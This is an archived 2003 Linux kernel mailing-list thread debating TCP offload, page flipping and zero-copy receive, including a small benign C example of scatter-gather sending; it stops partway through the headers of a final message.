From lm@bitmover.com Sun Jul 13 16:35:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 16:35:19 -0700 (PDT) Received: from smtp.bitmover.com (smtp.bitmover.com [192.132.92.12]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DNZBFl011739 for ; Sun, 13 Jul 2003 16:35:13 -0700 Received: from work.bitmover.com (ipcop.bitmover.com [192.132.92.15]) by smtp.bitmover.com (8.12.9/8.12.9) with ESMTP id h6E7bnm7005163; Mon, 14 Jul 2003 00:37:49 -0700 Received: (from lm@localhost) by work.bitmover.com (8.11.6/8.11.6) id h6DNZ3s13205; Sun, 13 Jul 2003 16:35:03 -0700 Date: Sun, 13 Jul 2003 16:35:03 -0700 From: Larry McVoy To: "David S. Miller" Cc: Roland Dreier , alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030713233503.GA31793@work.bitmover.com> Mail-Followup-To: Larry McVoy , "David S. Miller" , Roland Dreier , alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030713160200.571716cf.davem@redhat.com> User-Agent: Mutt/1.4i X-MailScanner-Information: Please contact the ISP for more information X-MailScanner: Found to be clean X-MailScanner-SpamCheck: not spam (whitelisted), SpamAssassin (score=0.5, required 7, AWL, DATE_IN_PAST_06_12) X-archive-position: 3999 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lm@bitmover.com Precedence: bulk X-list: netdev On Sun, Jul 13, 2003 at 04:02:00PM -0700, David S. 
Miller wrote: > On send this doesn't matter, on receive you use my clever receive > buffer handling + flow cache idea to accumulate the data portion of > packets into page sized chunks for the networking to flip. Please don't. I think page flipping was a bad idea. I think you'd be better off to try and make the data flow up the stack in small enough windows that it all sits in the cache. One thing SGI taught me (not that they wanted to do so) is that infinitely large packets are infinitely stupid, for lots of reasons. One is that you have to buffer them somewhere and another is that the bigger they are the bigger your cache needs to be to go fast. -- --- Larry McVoy lm at bitmover.com http://www.bitmover.com/lm From davem@redhat.com Sun Jul 13 16:49:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 16:49:14 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DNn7Fl012535 for ; Sun, 13 Jul 2003 16:49:07 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA09694; Sun, 13 Jul 2003 16:40:03 -0700 Date: Sun, 13 Jul 2003 16:40:03 -0700 From: "David S. 
Miller" To: Larry McVoy Cc: roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713164003.21839eb4.davem@redhat.com> In-Reply-To: <20030713233503.GA31793@work.bitmover.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4000 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 16:35:03 -0700 Larry McVoy wrote: > On Sun, Jul 13, 2003 at 04:02:00PM -0700, David S. Miller wrote: > > On send this doesn't matter, on receive you use my clever receive > > buffer handling + flow cache idea to accumulate the data portion of > > packets into page sized chunks for the networking to flip. > > Please don't. I think page flipping was a bad idea. I think you'd be > better off to try and make the data flow up the stack in small enough > windows that it all sits in the cache. At 10GB/sec nothing fits in the cache :-) > One thing SGI taught me (not that they wanted to do so) is that infinitely > large packets are infinitely stupid, for lots of reasons. One is that > you have to buffer them somewhere and another is that the bigger they > are the bigger your cache needs to be to go fast. The whole point is to not touch any of this data. The idea is to push the pages directly into the page cache of the filesystem. 
I'm not talking about doing this for userspace normal sys_recvmsg() type reads, that's an entirely different topic but if we ever did all agree to do something like that we'd have the network level infrastructure to do it already. From lm@bitmover.com Sun Jul 13 16:54:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 16:54:36 -0700 (PDT) Received: from smtp.bitmover.com (smtp.bitmover.com [192.132.92.12]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DNsVFl012861 for ; Sun, 13 Jul 2003 16:54:32 -0700 Received: from work.bitmover.com (ipcop.bitmover.com [192.132.92.15]) by smtp.bitmover.com (8.12.9/8.12.9) with ESMTP id h6E7vAm7005336; Mon, 14 Jul 2003 00:57:11 -0700 Received: (from lm@localhost) by work.bitmover.com (8.11.6/8.11.6) id h6DNsOj13384; Sun, 13 Jul 2003 16:54:24 -0700 Date: Sun, 13 Jul 2003 16:54:24 -0700 From: Larry McVoy To: "David S. Miller" Cc: Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030713235424.GB31793@work.bitmover.com> Mail-Followup-To: Larry McVoy , "David S. 
Miller" , Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030713164003.21839eb4.davem@redhat.com> User-Agent: Mutt/1.4i X-MailScanner-Information: Please contact the ISP for more information X-MailScanner: Found to be clean X-MailScanner-SpamCheck: not spam (whitelisted), SpamAssassin (score=0.5, required 7, AWL, DATE_IN_PAST_06_12) X-archive-position: 4001 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lm@bitmover.com Precedence: bulk X-list: netdev

> The whole point is to not touch any of this data.
>
> The idea is to push the pages directly into the page cache
> of the filesystem.

It doesn't work. Measure the cost of the VM operations before you go down this path. Just set up a system call that swaps a page with a kernel-allocated buffer and then see how many of those you can do a second. Maybe Linux is so blindingly fast this makes sense, but IRIX certainly wasn't; the VM overhead hurt like crazy.

Every time I tried to push the page flip idea or offloading or any of that crap, Andy Bechtolsheim would tell me "the CPUs will get faster faster than you can make that work". He was right.
-- --- Larry McVoy lm at bitmover.com http://www.bitmover.com/lm From davem@redhat.com Sun Jul 13 17:02:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:02:33 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E02QFl013250 for ; Sun, 13 Jul 2003 17:02:27 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA09728; Sun, 13 Jul 2003 16:53:23 -0700 Date: Sun, 13 Jul 2003 16:53:23 -0700 From: "David S. Miller" To: Larry McVoy Cc: lm@bitmover.com, roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713165323.3fc2601f.davem@redhat.com> In-Reply-To: <20030713235424.GB31793@work.bitmover.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4002 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 16:54:24 -0700 Larry McVoy wrote: > Every time I tried to push the page flip idea or offloading or any of > that crap, Andy Bechtolsheim would tell "the CPUs will get faster faster > than you can make that work". He was right. I really don't see why receive is so much of a big deal compared to send, and we do a send side version of this stuff already with zero problems. 
The NFS code is already basically ready to handle a fragmented packet (headers + pages), and could stick the page part into the page cache easily on receive.

And it's not the CPUs that really limit us here, it's memory bandwidth. It's one thing to have a PCI-X bus fast enough to service 10Gb/sec rates, it's yet another thing to have a memory bus and RAM underneath that which can handle moving that data over it _twice_.

The infrastructure needed to support this on the networking side helps us support other useful things, such as driver-local packet buffer recycling.

From lm@bitmover.com Sun Jul 13 17:22:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:22:17 -0700 (PDT) Received: from smtp.bitmover.com (smtp.bitmover.com [192.132.92.12]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0M9Fl013691 for ; Sun, 13 Jul 2003 17:22:09 -0700 Received: from work.bitmover.com (ipcop.bitmover.com [192.132.92.15]) by smtp.bitmover.com (8.12.9/8.12.9) with ESMTP id h6E8Olm7005704; Mon, 14 Jul 2003 01:24:47 -0700 Received: (from lm@localhost) by work.bitmover.com (8.11.6/8.11.6) id h6E0M0213745; Sun, 13 Jul 2003 17:22:00 -0700 Date: Sun, 13 Jul 2003 17:22:00 -0700 From: Larry McVoy To: "David S. Miller" Cc: Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030714002200.GA24697@work.bitmover.com> Mail-Followup-To: Larry McVoy , "David S.
Miller" , Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030713165323.3fc2601f.davem@redhat.com> User-Agent: Mutt/1.4i X-MailScanner-Information: Please contact the ISP for more information X-MailScanner: Found to be clean X-MailScanner-SpamCheck: not spam (whitelisted), SpamAssassin (score=0.5, required 7, AWL, DATE_IN_PAST_06_12) X-archive-position: 4003 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lm@bitmover.com Precedence: bulk X-list: netdev On Sun, Jul 13, 2003 at 04:53:23PM -0700, David S. Miller wrote: > On Sun, 13 Jul 2003 16:54:24 -0700 > Larry McVoy wrote: > > > Every time I tried to push the page flip idea or offloading or any of > > that crap, Andy Bechtolsheim would tell "the CPUs will get faster faster > > than you can make that work". He was right. > > I really don't see why receive is so much of a big deal > compared to send, and we do a send side version of this > stuff already with zero problems. Hey, maybe it isn't, but could you please quantify the cost of the VM operations? How hard is that? 
-- --- Larry McVoy lm at bitmover.com http://www.bitmover.com/lm From davem@redhat.com Sun Jul 13 17:33:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:33:25 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0XIFl014064 for ; Sun, 13 Jul 2003 17:33:18 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA09795; Sun, 13 Jul 2003 17:24:14 -0700 Date: Sun, 13 Jul 2003 17:24:14 -0700 From: "David S. Miller" To: Larry McVoy Cc: lm@bitmover.com, roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713172414.5c888094.davem@redhat.com> In-Reply-To: <20030714002200.GA24697@work.bitmover.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> <20030714002200.GA24697@work.bitmover.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4004 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 17:22:00 -0700 Larry McVoy wrote: > Hey, maybe it isn't, but could you please quantify the cost of the VM > operations? How hard is that? Ok. So the page is in a non-uptodate state, NFS would have it locked, and anyone else trying to get at it would sleep. 
This page we have currently is "dummy" in that it is only a place holder in case we don't get a full page from the networking. We have all the infrastructure to do everything up to this point. Next, if the networking gave us a full page, we'd "replace" the dummy page with this one, which would involve: 1) delete the dummy page from the lookup, insert the networking's page 2) arrange so that all sleepers on the dummy page will do a relookup and find the new page And when we're done with the operation we wake everyone up. I can't see any part of this turning out to be expensive. From davem@redhat.com Sun Jul 13 17:37:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:37:44 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0bcFl014380 for ; Sun, 13 Jul 2003 17:37:39 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA09815; Sun, 13 Jul 2003 17:28:36 -0700 Date: Sun, 13 Jul 2003 17:28:36 -0700 From: "David S. 
Miller"
To: Roland Dreier
Cc: alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com
Subject: Re: TCP IP Offloading Interface
Message-Id: <20030713172836.5dd493f5.davem@redhat.com>
In-Reply-To: <52llv2vu06.fsf@topspin.com>
References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <52llv2vu06.fsf@topspin.com>
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4005
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On 13 Jul 2003 17:20:41 -0700
Roland Dreier wrote:

> David> I didn't say I agree with all of Mogul's ideas, just his
> David> anti-TOE arguments. For example, I think RDMA sucks
> David> too yet he thinks it's a good idea.
>
> Sure, he talks about some weaknesses of TOE, but his conclusion is
> that the time has come for OS developers to start working on TCP
> offload (for storage).

The bad assumption here is that this belongs in the OS.

Let me ask you this: how many modern SCSI drivers have to speak every
piece of the SCSI bus protocol? Or Fibre Channel?

All of it is done on the cards, and that is what I think the iSCSI
people should be doing instead of putting garbage into the OS.

And I've presented a solution to the problem at the OS level that
doesn't require broken things like TOE and RDMA yet arrives at the
same result.

> But I also think Mogul is right: iSCSI HBAs are going to force OS
> designers to deal with TCP offload.

You don't need to offload TCP; it's the segmentation and checksumming
that have the high cost, not the actual TCP logic in the operating
system.

RDMA and TOE both add unnecessary complications.
My solution requires no protocol changes, just smart hardware which needs to be designed for any of the presented ideas anyways. From Valdis.Kletnieks@vt.edu Sun Jul 13 17:46:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:47:03 -0700 (PDT) Received: from turing-police.cc.vt.edu (h80ad2494.async.vt.edu [128.173.36.148]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0kfFl014721 for ; Sun, 13 Jul 2003 17:46:42 -0700 Received: from turing-police.cc.vt.edu (localhost [127.0.0.1]) by turing-police.cc.vt.edu (8.12.10.Beta0/8.12.10.Beta0) with ESMTP id h6E0kcMQ021180; Sun, 13 Jul 2003 20:46:38 -0400 Message-Id: <200307140046.h6E0kcMQ021180@turing-police.cc.vt.edu> X-Mailer: exmh version 2.6.3 04/04/2003 with nmh-1.0.4+dev To: "David S. Miller" Cc: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface In-Reply-To: Your message of "Sun, 13 Jul 2003 16:53:23 PDT." <20030713165323.3fc2601f.davem@redhat.com> From: Valdis.Kletnieks@vt.edu References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_-797710378P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Sun, 13 Jul 2003 20:46:38 -0400 X-archive-position: 4006 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Valdis.Kletnieks@vt.edu Precedence: bulk X-list: netdev --==_Exmh_-797710378P Content-Type: text/plain; charset=us-ascii On Sun, 13 Jul 2003 16:53:23 PDT, "David S. 
Miller" said:

> I really don't see why receive is so much of a big deal
> compared to send, and we do a send side version of this
> stuff already with zero problems.

Well.... there are optimizations you can do on the send side..

> The NFS code is already basically ready to handle a fragmented packet
> (headers + pages), and could stick the page part into the page cache
> easily on receive.

For example, in this case, you know a priori what the IP header will look
like, so you can use tricks like scatter-gather to send the header from one
place and a page-aligned data buffer from another, or start the packet at
(page boundary - IP_hdr_len), or tricks of that sort. In 20 years, I've seen
a lot of vendors do a lot of ugly things to speed up their IP stack, often
based on the fact that they knew a lot about the packet before they started
assembling it.

It's hard to do tricks like that when you don't know (for instance) how
many IP option fields the packet has until you've already started sucking
the packet off the wire - at which point either the NIC itself has to be clever
(Hmm, there's that IP offload again) or you have literally about 30 CPU cycles
to do interrupt latency *and* decide what to do....
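
As a rough userspace illustration of the send-side scatter-gather trick
described above: the header sits in one buffer, the payload in a separate
page-aligned buffer, and writev() hands both to the kernel as a single
message. This is only an analogy, not code from this thread or from the
kernel. HDR_LEN, PAYLOAD_LEN and gather_send_demo() are made-up names, and
an AF_UNIX socketpair stands in for a real NIC.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

#define HDR_LEN     20    /* hypothetical: size of an option-less IPv4 header */
#define PAYLOAD_LEN 1024  /* hypothetical payload size, well under one page */

/*
 * Gather a pre-built header and a page-aligned payload into one
 * datagram with writev(), so the caller never copies them into a
 * single contiguous staging buffer.  Returns 0 if the peer receives
 * header + payload back to back, -1 on any failure.
 */
int gather_send_demo(void)
{
	unsigned char hdr[HDR_LEN];
	unsigned char rx[HDR_LEN + PAYLOAD_LEN];
	void *payload = NULL;
	struct iovec iov[2];
	ssize_t sent, got;
	long page;
	int sv[2];
	int rc = -1;

	page = sysconf(_SC_PAGESIZE);
	if (page < PAYLOAD_LEN)
		return -1;
	if (posix_memalign(&payload, (size_t)page, (size_t)page) != 0)
		return -1;
	/* The data buffer really does start on a page boundary. */
	assert((uintptr_t)payload % (uintptr_t)page == 0);

	if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) != 0) {
		free(payload);
		return -1;
	}

	/* The sender knows the whole header before any data moves. */
	memset(hdr, 0x45, sizeof(hdr));
	memset(payload, 0xAB, PAYLOAD_LEN);

	iov[0].iov_base = hdr;       /* header from one place ...      */
	iov[0].iov_len  = sizeof(hdr);
	iov[1].iov_base = payload;   /* ... page-aligned data from another */
	iov[1].iov_len  = PAYLOAD_LEN;

	sent = writev(sv[0], iov, 2);
	if (sent == (ssize_t)sizeof(rx)) {
		got = recv(sv[1], rx, sizeof(rx), 0);
		if (got == (ssize_t)sizeof(rx) &&
		    memcmp(rx, hdr, HDR_LEN) == 0 &&
		    memcmp(rx + HDR_LEN, payload, PAYLOAD_LEN) == 0)
			rc = 0;
	}

	close(sv[0]);
	close(sv[1]);
	free(payload);
	return rc;
}
```

The sketch works because the sender fixes HDR_LEN up front. A receiver
cannot do the same split until it has parsed the header and seen how long
it actually is, which is the asymmetry being argued about here.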
--==_Exmh_-797710378P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) Comment: Exmh version 2.5 07/13/2001 iD8DBQE/Ef1ucC3lWbTT17ARArLqAJ9Nm0BoBW0sAS12YRjHQqnbS8taaACgisgU ouu0kT76znvhJ7TPiI5Nm8I= =J2r1 -----END PGP SIGNATURE----- --==_Exmh_-797710378P-- From lm@bitmover.com Sun Jul 13 17:48:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:48:32 -0700 (PDT) Received: from smtp.bitmover.com (smtp.bitmover.com [192.132.92.12]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0mIFl015029 for ; Sun, 13 Jul 2003 17:48:18 -0700 Received: from work.bitmover.com (ipcop.bitmover.com [192.132.92.15]) by smtp.bitmover.com (8.12.9/8.12.9) with ESMTP id h6E8oum7006040; Mon, 14 Jul 2003 01:50:56 -0700 Received: (from lm@localhost) by work.bitmover.com (8.11.6/8.11.6) id h6E0m9i14058; Sun, 13 Jul 2003 17:48:09 -0700 Date: Sun, 13 Jul 2003 17:48:09 -0700 From: Larry McVoy To: "David S. Miller" Cc: Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030714004809.GB24697@work.bitmover.com> Mail-Followup-To: Larry McVoy , "David S. 
Miller" , Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> <20030714002200.GA24697@work.bitmover.com> <20030713172414.5c888094.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030713172414.5c888094.davem@redhat.com> User-Agent: Mutt/1.4i X-MailScanner-Information: Please contact the ISP for more information X-MailScanner: Found to be clean X-MailScanner-SpamCheck: not spam (whitelisted), SpamAssassin (score=0.5, required 7, AWL, DATE_IN_PAST_06_12) X-archive-position: 4007 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lm@bitmover.com Precedence: bulk X-list: netdev On Sun, Jul 13, 2003 at 05:24:14PM -0700, David S. Miller wrote: > I can't see any part of this turning out to be expensive. In theory, practice and theory are the same... I think the point I'm trying to make is that the VM stuff costs something and it shouldn't be that hard to dummy up a system call to measure it. It was counterintuitive as hell at SGI that the VM stuff would cost that much and the reasons are subtle. Part of the problem turned out to be falling out of the instruction cache - the network stack and the VM system didn't fit and that left no room at all for the app. If you are trading instruction cache misses for data misses, err, dude, I think that might be a problem. The point is to process all the data with less, not more, cache misses, right? 
In fact, if we agree on that then that leads you to considering the various ways you could do this and maybe your way is the right way but maybe there is a less cache intensive way. If you're right you're right, so peace. But I'd like the definition of "right" to be "less cache misses to do the same thing". In fact, if I managed to communicate only one thing in my entire set of rants and it was "pay attention to cache misses", hey, that'd be cool with me. That's how you make things go fast and I like fast. Think about it, a 3GHz machine is a .3ns clock cycle and the suckers are super scalar and hyper threaded and all that crud. Memory is about 133ns away. That's 400 clocks of stall for each cache miss. Lotta code can run in 400 clocks of super scalar/hyper threaded/fully buzzword enabled processors. -- --- Larry McVoy lm at bitmover.com http://www.bitmover.com/lm From davem@redhat.com Sun Jul 13 17:52:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:52:04 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0ptFl015350 for ; Sun, 13 Jul 2003 17:51:58 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA09880; Sun, 13 Jul 2003 17:42:42 -0700 Date: Sun, 13 Jul 2003 17:42:42 -0700 From: "David S. 
Miller"
To: Valdis.Kletnieks@vt.edu
Cc: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com
Subject: Re: TCP IP Offloading Interface
Message-Id: <20030713174242.3ceb8213.davem@redhat.com>
In-Reply-To: <200307140046.h6E0kcMQ021180@turing-police.cc.vt.edu>
References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> <200307140046.h6E0kcMQ021180@turing-police.cc.vt.edu>
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4008
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Sun, 13 Jul 2003 20:46:38 -0400
Valdis.Kletnieks@vt.edu wrote:

> On Sun, 13 Jul 2003 16:53:23 PDT, "David S. Miller" said:
>
> > I really don't see why receive is so much of a big deal
> > compared to send, and we do a send side version of this
> > stuff already with zero problems.
>
> Well.... there are optimizations you can do on the send side..

I consider the send side completely covered already. We don't touch
any of the data portion; we only put together the headers.

> It's hard to do tricks like that when you don't know (for instance) how
> many IP option fields the packet has until you've already started sucking
> the packet off the wire - at which point either the NIC itself has to be clever
> (Hmm, there's that IP offload again) or you have literally about 30 CPU cycles
> to do interrupt latency *and* decide what to do....

There are cards, both existing and in development, that have very
simple header parsing engines you can program to do stuff like this;
it isn't hard at all.
But this is only half of the problem, you need a flow cache and clever RX buffer management as well to make the RX side zero-copy stuff work. From jgarzik@pobox.com Sun Jul 13 17:53:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:53:11 -0700 (PDT) Received: from www.linux.org.uk (IDENT:4ZYppHV6YjA5pG0aQq3aH4lRDjZDEYWG@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0r5Fl015661 for ; Sun, 13 Jul 2003 17:53:06 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19bkAv-0004LC-1P; Sun, 13 Jul 2003 17:58:13 +0100 Message-ID: <3F118F99.1020104@pobox.com> Date: Sun, 13 Jul 2003 12:58:01 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Alan Cox CC: Roland Dreier , "David S. Miller" , Alan Shih , Linux Kernel Mailing List , linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <1058113895.554.7.camel@dhcp22.swansea.linux.org.uk> In-Reply-To: <1058113895.554.7.camel@dhcp22.swansea.linux.org.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4009 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: 